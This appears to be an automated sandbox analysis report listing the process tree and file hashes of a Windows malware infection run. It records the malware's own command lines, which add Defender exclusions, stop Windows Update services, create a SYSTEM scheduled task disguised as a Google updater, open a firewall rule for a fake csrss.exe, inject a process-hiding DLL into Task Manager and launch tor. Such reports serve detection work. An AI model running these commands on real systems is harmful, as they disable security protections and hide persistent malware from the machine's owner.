"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7356 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\143.exe
C:\Users\Admin\AppData\Local\Temp\143.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2A67.exe
C:\Users\Admin\AppData\Local\Temp\2A67.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\forc.exe
"C:\Users\Admin\AppData\Local\Temp\forc.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\2F0C.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,9181901244641388475,2846136992859046704,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\8F5D.exe
C:\Users\Admin\AppData\Local\Temp\8F5D.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\E8E8.exe
C:\Users\Admin\AppData\Local\Temp\E8E8.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Users\Admin\AppData\Local\Temp\EE58.exe
C:\Users\Admin\AppData\Local\Temp\EE58.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\EFC0.exe
C:\Users\Admin\AppData\Local\Temp\EFC0.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\NextSink\hsgqmy\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\hsgqmy\TypeId.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,3729593668803357341,17440018679553173833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
